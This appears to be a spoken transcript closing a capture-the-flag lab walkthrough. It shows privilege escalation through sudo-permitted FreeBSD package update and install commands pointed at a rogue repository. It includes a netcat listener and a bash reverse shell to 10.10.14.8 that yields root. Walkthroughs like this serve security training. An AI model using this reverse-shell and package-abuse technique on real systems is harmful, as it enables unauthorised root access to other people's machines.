BSD as well. Let's see. Sudo package update. It's taking a while. So 10.10.14.8. Update this. Oh. You know that moment you realize what you did wrong? SCP. It's temp package. I created a directory package. Right? Yeah. So in temp, this is my old package, so I just downloaded the old thing again. There we go. I think sanity is restored. So that should be fine. Let's make sure the host file is correct. So sudo package update. Let's see, what am I? Move this into packages. Okay. Okay, so it got the packages and we don't have any complaints. So let's nc lvnp 9001 and see if we can install X. Proceed with installation, yes. Temp shell sh not found. So let's create that file. So it's bin bash, then bash-i dev tcp 10.10.14.8 9001 0 and 1 chmod plus x shell.sh package install, yes, and we get a root shell. So that is doing it the intended way with package update and package install. But hope you guys enjoyed that. Take care, and I'll see you all next week.